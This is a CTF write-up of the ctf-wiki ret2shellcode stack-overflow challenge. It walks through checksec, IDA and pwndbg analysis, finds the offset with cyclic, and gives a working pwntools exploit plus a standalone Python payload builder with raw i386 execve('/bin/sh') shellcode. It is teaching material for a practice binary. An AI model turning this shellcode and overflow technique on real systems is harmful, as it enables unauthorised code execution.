The challenge comes from ctf-wiki, a very good site for getting started with CTF (I am a newbie myself and hope to grow together with the experts). Challenge link: https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic-rop-zh/
1. First, run checksec on the binary to see the architecture and which mitigations are enabled:
root@moli-virtual-machine:~/文檔# checksec ret2shellcode
[*] '/root/\xe6\x96\x87\xe6\xa1\xa3/ret2shellcode'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
2. Open the binary in 32-bit IDA and press F5 to look at the decompiled source:
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+1Ch] [ebp-64h]

  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  puts("No system for you this time !!!");
  gets(&s);
  strncpy(buf2, &s, 0x64u);
  printf("bye bye ~");
  return 0;
}
We can see that gets reads unbounded input into s (the stack overflow), and strncpy then copies the first 0x64 bytes of s into buf2. Double-click buf2: it lives in the .bss section.
.bss:0804A080 ; char buf2[100]
.bss:0804A080 buf2            db 64h dup(?)           ; DATA XREF: main+7B↑o
.bss:0804A080 _bss            ends
3. Do some quick debugging under pwndbg and use vmmap to check whether the .bss section is executable:
pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
 0x8048000  0x8049000 r-xp     1000 0      /root/文檔/ret2shellcode
 0x8049000  0x804a000 r-xp     1000 0      /root/文檔/ret2shellcode
 0x804a000  0x804b000 rwxp     1000 1000   /root/文檔/ret2shellcode
0xf7ddc000 0xf7fb1000 r-xp   1d5000 0      /lib/i386-linux-gnu/libc-2.27.so
0xf7fb1000 0xf7fb2000 ---p     1000 1d5000 /lib/i386-linux-gnu/libc-2.27.so
0xf7fb2000 0xf7fb4000 r-xp     2000 1d5000 /lib/i386-linux-gnu/libc-2.27.so
0xf7fb4000 0xf7fb5000 rwxp     1000 1d7000 /lib/i386-linux-gnu/libc-2.27.so
0xf7fb5000 0xf7fb8000 rwxp     3000 0
0xf7fd0000 0xf7fd2000 rwxp     2000 0
0xf7fd2000 0xf7fd5000 r--p     3000 0      [vvar]
0xf7fd5000 0xf7fd6000 r-xp     1000 0      [vdso]
0xf7fd5000 0xf7ffe000 rwxp    29000 0      <explored>
0xf7fd6000 0xf7ffc000 r-xp    26000 0      /lib/i386-linux-gnu/ld-2.27.so
0xf7ffc000 0xf7ffd000 r-xp     1000 25000  /lib/i386-linux-gnu/ld-2.27.so
0xf7ffd000 0xf7ffe000 rwxp     1000 26000  /lib/i386-linux-gnu/ld-2.27.so
0xfffdd000 0xffffe000 rwxp    21000 0      [stack]
The third mapping above (0x804a000-0x804b000, rwxp) shows that the .bss section, and with it buf2, is executable; this is what "NX disabled" in the checksec output means in practice.
So this time we make the program execute shellcode: we send the shellcode as input (gets puts it on the stack, strncpy copies it into buf2), and then overwrite the return address so that control flow lands on the copy in .bss.
4. Looking at the assembly, the program addresses its locals through esp rather than ebp, so the "[ebp-64h]" that IDA shows for s cannot be trusted for the distance to the saved return address; the offset has to be measured with gdb instead.
.text:08048593                 call    _gets
.text:08048598                 mov     dword ptr [esp+8], 64h ; n
.text:080485A0                 lea     eax, [esp+80h+s]
.text:080485A4                 mov     [esp+4], eax    ; src
.text:080485A8                 mov     dword ptr [esp], offset buf2 ; dest
.text:080485AF                 call    _strncpy
.text:080485B4                 mov     dword ptr [esp], offset format ; "bye bye ~"
.text:080485BB                 call    _printf
.text:080485C0                 mov     eax, 0
.text:080485C5                 leave
.text:080485C6                 retn
.text:080485C6 ; } // starts at 804852D
Set a breakpoint on the call to gets:
pwndbg> b *0x08048593
Breakpoint 1 at 0x8048593: file ret2shellcode.c, line 14.
Then use cyclic to generate a de Bruijn pattern (not random data: every 4-byte window in it is unique, which is what lets us map a register value back to an offset):
pwndbg> cyclic 400
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaad
Step over the call with ni and paste the generated pattern as the input to gets:
pwndbg> ni
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaad
...
 EBP  0xffffd0c8 ◂— 0x62616163 ('caab')
The slot that ebp points at (the saved ebp of main's frame) now holds 'caab', so the pattern reached it; use cyclic -l to compute how far into the pattern that is:
pwndbg> cyclic -l caab
108
Since the program is 32-bit, the saved ebp is 4 bytes, so the return address sits at 108 + 4 = 112 bytes from the start of s.
5. Write the shellcode
Here the ready-made shellcode from pwntools is enough.
(1) First set the target's parameters:
context(os='linux',arch='i386',log_level='debug')
(2) Obtain the shellcode
1) Get the machine code for the assembly that spawns /bin/sh. Note that shellcraft.sh() emits an execve("/bin/sh") syscall stub, not a call to libc's system(), which is exactly why it still works when the binary gives us "no system":
asm(shellcraft.sh())
Put together, this part looks like this:
from pwn import *
context(log_level = 'debug', arch = 'i386', os = 'linux')
shellcode = asm(shellcraft.sh())
6. Since we are only attacking the local binary, the context settings above can be left at their defaults (pwntools already defaults to i386 Linux).
The exploit is as follows:
from pwn import *

io = process('./ret2shellcode')
shellcode = asm(shellcraft.sh())   # execve("/bin/sh") shellcode for i386 (pwntools default context)
buf2_addr = 0x0804A080             # address of buf2 in .bss, which vmmap showed is rwx
# shellcode, 'A' padding up to the return address at offset 112, then the address
# of buf2: strncpy copies the first 0x64 bytes of s (shellcode + padding) there,
# and the overwritten return address sends execution to that copy
io.sendline(shellcode.ljust(112, b'A') + p32(buf2_addr))
io.interactive()
執行以後的結果
[+] Starting local process './ret2shellcode': pid 3172
[*] Switching to interactive mode
No system for you this time !!!
bye bye ~$
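As an added example that is not part of the original writeup, the script below reproduces in plain Python (no pwntools needed) the two pieces of tooling used above: the cyclic pattern and the "cyclic -l" offset lookup from step 4, and the payload construction from step 6, with the checks a practitioner wants before sending anything: the shellcode must fit in the 0x64 bytes that strncpy copies into buf2, must contain no NUL byte (strncpy would stop copying there) and no newline (gets would stop reading there). The buf2 address, copy length and 112-byte return-address offset are the ones found in the writeup; the embedded shellcode is a standard null-free i386 execve("/bin/sh") stub substituted for asm(shellcraft.sh()). The script only builds and checks the payload; it does not run the binary.

```python
import itertools
import string
import struct

ALPHABET = string.ascii_lowercase   # pwntools' default cyclic alphabet
SUBSEQ_LEN = 4                      # one 32-bit register's worth of pattern

# Values from the writeup above: buf2 is at 0x0804A080 in .bss, strncpy copies
# 0x64 bytes into it, and the return address is 112 bytes past the start of s.
BUF2_ADDR = 0x0804A080
COPY_LEN = 0x64
RET_OFFSET = 112

# Standard null-free i386 execve("/bin//sh", ["/bin//sh"], NULL) shellcode,
# embedded here so the script runs without pwntools (the writeup uses
# asm(shellcraft.sh()) instead).
SHELLCODE = (
    b"\x31\xc0"              # xor  eax, eax
    b"\x31\xd2"              # xor  edx, edx        ; envp = NULL
    b"\x50"                  # push eax             ; NUL terminator for the path
    b"\x68\x2f\x2f\x73\x68"  # push "//sh"
    b"\x68\x2f\x62\x69\x6e"  # push "/bin"
    b"\x89\xe3"              # mov  ebx, esp        ; ebx = "/bin//sh"
    b"\x50"                  # push eax             ; argv[1] = NULL
    b"\x53"                  # push ebx             ; argv[0] = "/bin//sh"
    b"\x89\xe1"              # mov  ecx, esp        ; ecx = argv
    b"\xb0\x0b"              # mov  al, 11          ; SYS_execve
    b"\xcd\x80"              # int  0x80
)


def de_bruijn(alphabet=ALPHABET, n=SUBSEQ_LEN):
    """Lazily yield the de Bruijn sequence B(k, n): every n-char window is unique."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for idx in a[1:p + 1]:
                    yield alphabet[idx]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, alphabet=ALPHABET, n=SUBSEQ_LEN):
    """Equivalent of `cyclic <length>`: the first `length` characters of the pattern."""
    return "".join(itertools.islice(de_bruijn(alphabet, n), length))


def cyclic_find(needle, alphabet=ALPHABET, n=SUBSEQ_LEN):
    """Equivalent of `cyclic -l`: offset of one 4-char window, given as str, bytes,
    or the little-endian integer gdb prints for the register (0x62616163 == 'caab')."""
    if isinstance(needle, int):
        needle = struct.pack("<I", needle)
    if isinstance(needle, bytes):
        needle = needle.decode()
    if len(needle) != n:
        raise ValueError("needle must be exactly %d characters" % n)
    window = ""
    for i, ch in enumerate(de_bruijn(alphabet, n)):
        window = (window + ch)[-n:]
        if window == needle:
            return i - n + 1
    return -1


def check_shellcode(shellcode, copy_len=COPY_LEN):
    """Problems that would stop this shellcode from surviving gets() and strncpy()."""
    problems = []
    if len(shellcode) > copy_len:
        problems.append("longer than the %d bytes strncpy copies into buf2" % copy_len)
    if b"\x00" in shellcode:
        problems.append("contains a NUL byte, so strncpy stops copying before the end")
    if b"\n" in shellcode:
        problems.append("contains a newline, so gets() stops reading before the end")
    return problems


def build_payload(shellcode=SHELLCODE, ret_offset=RET_OFFSET, target=BUF2_ADDR):
    """shellcode, 'A' padding up to the saved return address, then the address of buf2."""
    problems = check_shellcode(shellcode)
    if problems:
        raise ValueError("; ".join(problems))
    return shellcode.ljust(ret_offset, b"A") + struct.pack("<I", target)


if __name__ == "__main__":
    print(cyclic(400))
    print("offset of 'caab':", cyclic_find("caab"))
    print("offset of 0x62616163:", cyclic_find(0x62616163))
    payload = build_payload()
    print("payload (%d bytes):" % len(payload), payload.hex())
```

The padding byte is 'A' and not '\x00' for the same reason the shellcode is checked for NULs: the first 0x64 bytes of the payload are what strncpy carries into buf2, and a NUL anywhere in that window ends the copy. The return address itself (offset 112) lies past the copied window, so it only has to avoid the newline that ends gets.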